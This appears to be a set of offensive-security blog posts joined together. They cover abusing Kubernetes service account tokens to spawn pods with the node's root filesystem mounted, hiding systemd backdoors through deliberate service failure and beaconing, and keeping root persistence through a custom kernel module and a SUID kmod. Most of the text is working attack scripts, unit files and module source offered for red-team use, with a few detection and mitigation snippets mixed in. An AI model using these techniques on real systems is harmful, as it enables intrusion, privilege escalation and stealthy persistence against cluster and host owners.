Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing for my Certified Kubernetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option automatically mounts the service account token within each container of a given pod. The token is meant to give the pod the ability to interact with the Kubernetes API server. Because the option is enabled by default, it creates a great way for attackers with access to a single container to abuse Kubernetes with the automount service account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specification. This is because the service account dictates permissions and is the identity a pod’s processes use when talking to the API server. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pod’s namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes, the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller checks the pod spec for a valid service account and adds the “default” service account if one isn’t set. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or the service account spec, then the admission controller will also add a volume mount for the service account token to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.
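To make the decision described above a little more concrete, here is a minimal sketch of how the two settings combine. It is only a model of the documented behavior, not the admission controller’s actual code, and the function name effective_automount is my own. It assumes the pod spec wins whenever both the pod and the service account set the field.

```python
from typing import Optional


def effective_automount(pod_setting: Optional[bool],
                        sa_setting: Optional[bool]) -> bool:
    """Return True if the token volume would be auto-mounted.

    None means the field was left unset in the corresponding spec.
    (Hypothetical helper, used here only to illustrate the precedence.)
    """
    # The pod spec takes precedence when it sets the field explicitly.
    if pod_setting is not None:
        return pod_setting
    # Otherwise fall back to the service account's setting.
    if sa_setting is not None:
        return sa_setting
    # Neither spec set the field, so the token is mounted by default.
    return True


if __name__ == "__main__":
    for pod, sa in [(None, None), (None, False), (True, False), (False, None)]:
        print(f"pod={pod} sa={sa} -> mounted={effective_automount(pod, sa)}")
```

The takeaway is that leaving both fields unset is what produces the mounted token, which is the case for most pods.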

Why is the AutomountServiceAccountToken bad?

Since the permissions are assigned to a service account and all pod processes authenticate as that service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling has utilized the service account token to communicate with Kubernetes, and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that, on clusters without RBAC enforcement or with permissive role bindings, the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but luckily almost all major programming languages already have Kubernetes client libraries. In my case, I often write in Python, and the Python client library can handle loading a container’s service account token. With that token we can utilize simple function calls, like those in the following example, to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security policies to restrict the ability to mount a node’s local root filesystem, we can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the node’s root filesystem, using a similar script.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
                    'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom command")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use a node selector with a label like “kubernetes.io/hostname” to try to get the new pod to spin up on a higher-value control plane node.

With access to a pod container that has the node’s root filesystem mounted, normal file and credential pillaging can take place. With write access, easier persistence methods can also be used, like adding a crontab or leveraging controlled failure of systemd services (see my recent post), to gain a foothold on the Kubernetes control plane.
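From the defender’s side, manifests like the one above are fairly easy to flag before they are admitted. The following is a rough sketch of such a check, working on a plain dict shaped like the pod_manifest used earlier. The function names are my own, and a real admission policy would need to cover far more than this.

```python
def find_hostpath_volumes(pod_manifest: dict) -> list:
    """Return (volume name, host path) pairs for every hostPath volume."""
    spec = pod_manifest.get("spec") or {}
    findings = []
    for volume in spec.get("volumes") or []:
        host_path = volume.get("hostPath")
        if host_path is not None:
            findings.append((volume.get("name"), host_path.get("path")))
    return findings


def mounts_node_root(pod_manifest: dict) -> bool:
    """True if any hostPath volume points at the node's root filesystem."""
    return any(path == "/" for _, path in find_hostpath_volumes(pod_manifest))


if __name__ == "__main__":
    # Same volume layout as the "support" pod manifest shown earlier.
    manifest = {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": "support"},
        "spec": {
            "containers": [{"name": "sleep", "image": "busybox"}],
            "volumes": [{"name": "host",
                         "hostPath": {"path": "/", "type": "Directory"}}],
        },
    }
    print(find_hostpath_volumes(manifest))
    print(mounts_node_root(manifest))
```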

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017, this issue is unlikely to be addressed until API v2 is available, because the current behavior is required for backwards compatibility. That being said, it can still be addressed manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change into the admission controller, but that would risk compatibility issues and break future upgrades.
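The manual fix can be scripted with the same Python client used earlier. This is only a sketch under a few assumptions: the helper names are mine, v1 is expected to be a CoreV1Api object created by the caller, and the credentials in use must be allowed to patch service accounts.

```python
def automount_disable_patch() -> dict:
    """Patch body that turns off token automounting on a service account."""
    return {"automountServiceAccountToken": False}


def disable_default_automount(v1, namespaces) -> list:
    """Patch the "default" service account in each given namespace.

    v1 is expected to behave like kubernetes.client.CoreV1Api.
    Returns the list of namespaces that were patched.
    """
    patched = []
    for namespace in namespaces:
        v1.patch_namespaced_service_account(
            name="default",
            namespace=namespace,
            body=automount_disable_patch(),
        )
        patched.append(namespace)
    return patched


# Example usage from an admin workstation (not run here):
#   from kubernetes import client, config
#   config.load_kube_config()
#   v1 = client.CoreV1Api()
#   names = [ns.metadata.name for ns in v1.list_namespace().items]
#   disable_default_automount(v1, names)
```

Keep in mind this only changes the default. Any pod spec that explicitly sets automountServiceAccountToken to true will still get the token mounted.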

Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red-teaming and competitions/events. However, over the years administrators have become more accustomed to systemd and how to work with its units. As a result, these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expected systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, it’s much harder to detect a service with a common name that isn’t actually running when someone looks at a list of running services. It is also possible to hide activities from logging and other monitoring tools. Finally, the StartLimit* options within a systemd unit, like a service, can be used to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method we can simply have the service execute and background a given command, then exit 1/false. The result is a failed start, which effectively leaves the shell code running as a background process. Below is an example of a service that is very similar to the one in the last systemd blog post.

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The benefit is pretty simple: the service won’t show up when currently running services are queried. However, information about the process and the command run will be within the service logs. This could lead to quick discovery if the logs and/or service errors are reviewed by an administrator. So overall I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units --failed’ to review what’s going on with the system.
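If you would rather script that check, the output is easy enough to parse. Below is a small sketch that assumes the command is run with the --plain and --no-legend flags so each line is just the unit, load state, active state, sub state and description. The function names are my own, and the leading bullet handling is only there in case a marker still shows up.

```python
import subprocess


def parse_failed_units(output: str) -> list:
    """Parse 'systemctl list-units --failed --plain --no-legend' output."""
    units = []
    for line in output.splitlines():
        fields = line.split(None, 4)
        # Drop a leading status marker if one is present.
        if fields and fields[0] in ("●", "*", "×"):
            fields = line.split(None, 5)[1:]
        if len(fields) < 4:
            continue  # blank or unexpected line
        units.append({
            "unit": fields[0],
            "load": fields[1],
            "active": fields[2],
            "sub": fields[3],
            "description": fields[4] if len(fields) > 4 else "",
        })
    return units


def list_failed_units() -> list:
    """Run systemctl and return the parsed failed units."""
    result = subprocess.run(
        ["systemctl", "list-units", "--failed", "--plain", "--no-legend"],
        capture_output=True, text=True, check=False,
    )
    return parse_failed_units(result.stdout)


if __name__ == "__main__":
    for unit in list_failed_units():
        print(unit["unit"], "-", unit["description"])
```

Running something like this from a scheduled job and diffing the result against a known baseline would make a newly failing but familiar looking service stand out.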

Method B: Expect failure and trigger OnFailure Unit

This method utilizes a legitimate service unit file from a common program that’s not actually installed. Since the started service’s intended binaries and configuration files don’t actually exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit, similar to this systemd-unit-status-mailer example. The idea being, we can hide our activity within another unit to leverage controlled failure to maintain persistence. An example for this method consists of the following.

First we can modify an existing unit, or copy a new one from a common package, and add the OnFailure option to trigger the secondary unit.

[Unit]
...
OnFailure=unit-status-mail@%n.service

Next we can utilize a legitimate looking secondary unit like the common unit status mailer to just execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally we could add shellcode directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status $UNIT)

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is the malicious process is nested within execution of a secondary systemd unit, which only triggers on failure. This means that the execution isn’t within the purview of systemd itself and therefore will not show up within standard logs.
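That also means the OnFailure option itself is the artifact worth hunting for. As a rough sketch from the defender’s side, the following pulls the OnFailure targets out of the text of a unit file. The function name is my own, and it deliberately ignores drop-in directories and line continuations, so treat it as a starting point only.

```python
def find_onfailure_targets(unit_text: str) -> list:
    """Return the units listed in OnFailure= within the [Unit] section."""
    targets = []
    section = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        # Skip blank lines and comments.
        if not line or line.startswith(("#", ";")):
            continue
        # Track which section we are currently in.
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Unit" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "OnFailure":
                # The option takes a space-separated list of unit names.
                targets.extend(value.split())
    return targets


if __name__ == "__main__":
    example = """[Unit]
Description=Example service
OnFailure=unit-status-mail@%n.service

[Service]
ExecStart=/usr/bin/example
"""
    print(find_onfailure_targets(example))
```

Any target that shows up on a unit shipped without one by its package is worth a closer look, along with whatever script that target ends up running.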

Leveraging Start Limits for effective Beaconing

There are several options available to control how and when systemd will take an action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, we can create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5 minute beacon can be done like the following example.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300
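To sanity check the numbers in a unit like this, it helps to model the start limit. The sketch below is a simplified fixed-window approximation of how I understand the rate limit to behave, not systemd’s actual implementation. The function name and the run_sec parameter (how long each failed start takes) are assumptions of mine.

```python
from typing import Optional


def first_refused_start(restart_sec: float, burst: int, interval_sec: float,
                        attempts: int = 100,
                        run_sec: float = 1.0) -> Optional[int]:
    """Return the 1-based start attempt that hits the limit, or None.

    Simplified model: a window opens at the first start, and at most
    `burst` starts are allowed until more than `interval_sec` has passed.
    """
    window_begin = None
    count = 0
    now = 0.0
    for attempt in range(1, attempts + 1):
        if window_begin is None or now - window_begin > interval_sec:
            # A new window opens and this start is the first one in it.
            window_begin = now
            count = 1
        elif count < burst:
            count += 1
        else:
            return attempt  # the limit is hit and the unit stays failed
        # The next start happens after the run time plus RestartSec.
        now += run_sec + restart_sec
    return None


if __name__ == "__main__":
    # Values from the unit above: 12 starts per 3600 seconds, 300s apart.
    print(first_refused_start(restart_sec=300, burst=12, interval_sec=3600))
    # A shorter RestartSec would trip the limit in this model.
    print(first_refused_start(restart_sec=100, burst=12, interval_sec=3600))
```

In this model the values above never trip the limit, since the thirteenth start lands just after the one hour window has passed. That is also why a restart loop like this one does not end up in a permanent failed state where it might get noticed.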

The option ‘RefuseManualStop=True’ can be used to prevent users from being able to manually stop a given service unit.

Establish Persistence with a Custom Kernel Module

First and foremost, I have to admit that establishing persistence with a custom kernel module isn’t the most ideal way. Creating kernel modules isn’t that easy. Kernel modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think it’s a valuable learning experience that all Linux security professionals should understand. For a much easier way to maintain access to modern systems, check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel, it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead we can leverage the kernel function “call_usermodehelper” to execute a command in userspace. Since by default only the root user can request that a module be loaded, this gives us command execution as root. In its most simplistic form, the source code for a module, test_shell.c, would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it into a standard C application instead. This allows the module to attempt to execute the staged application as root and still return normally regardless of what happens. The source code for a simple C execution program, named exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, it’s possible to create variables for the user’s environment and command line arguments to be passed directly to the ‘call_usermodehelper’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    // argv[0] is the program itself; "-c" makes bash run the wall command
    char *argv[] = {
    "/bin/bash",
    "-c",
    "wall \"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need to have all of the required tools for kernel development and the current kernel’s header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ on Red Hat based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel builder) extension at the top to compile our module. Just keep in mind that kbuild will switch to the kernel source directory and only allow includes of headers within the original source.

obj-m += test_shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load a module directly into the kernel and ‘rmmod test_shell.ko’ to remove the module. This allows for easy testing of modules before configuring them to be automatically loaded at boot.

Once the module is compiled and tests successfully, we can copy the module to the current kernel’s modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to build out the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system won’t know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have persistence with the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod, depending on which is used. In most cases you can easily figure out if it’s a kmod system by checking whether the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`
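The same check can be scripted if you want to run it across a number of hosts. This is a minimal sketch using only the Python standard library, and the function names are my own. It simply resolves the symlink chain and looks at the final file name.

```python
import os
import shutil
from typing import Optional


def resolves_to_kmod(tool_path: str) -> bool:
    """True if the given tool path ultimately points at a file named kmod."""
    return os.path.basename(os.path.realpath(tool_path)) == "kmod"


def modprobe_uses_kmod() -> Optional[bool]:
    """Check the modprobe found on PATH, or return None if there is none."""
    path = shutil.which("modprobe")
    if path is None:
        return None
    return resolves_to_kmod(path)


if __name__ == "__main__":
    print("modprobe is a kmod symlink:", modprobe_uses_kmod())
```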

If you do see that modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/modules config file. This can be done with a simple command like the following. It will cause the systemd-modules-load service to utilize kmod to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interestingly, you can actually set the SUID bit on kmod so standard users can load modules as root. Whereas if you set SUID on the legacy modprobe executable, it still runs in the user’s context instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation, similar to the dash shell method I’ve blogged about before.

If it’s not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modprobe.d/ directory. The content of the .conf should look similar to:

install test_shell

On modprobe systems, standard users can also request a module be loaded, if there is a valid configuration file that already exists. But any code execution is done within the requesting users context. Interestingly enough you can have modprobe run a terminal command after loading a module by appending a command to the end of install statement in the config file. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted and networking has been established when the module is loaded.
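Since install statements can carry arbitrary commands, they are worth reviewing on any system you are responsible for. Here is a rough sketch of a check that lists every install line found in the text of a modprobe config file. The function name is my own, and it does not handle backslash line continuations, so it is a first pass rather than a complete parser.

```python
def find_install_commands(conf_text: str) -> list:
    """Return (module, command) pairs for each 'install' line."""
    findings = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        # Skip blank lines and comments.
        if not line or line.startswith("#"):
            continue
        # Format: install <module> <command...>
        parts = line.split(None, 2)
        if parts[0] == "install" and len(parts) >= 2:
            command = parts[2] if len(parts) == 3 else ""
            findings.append((parts[1], command))
    return findings


if __name__ == "__main__":
    example = """# example config
blacklist pcspkr
install pcspkr /bin/true
options snd_hda_intel power_save=1
"""
    for module, command in find_install_commands(example):
        print(module, "->", command)
```

Feeding it the contents of each file under /etc/modprobe.d/ and comparing the result against what the installed packages ship should surface any unexpected entries.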

With all that work complete, we have established persistence, until the kernel is updated at least.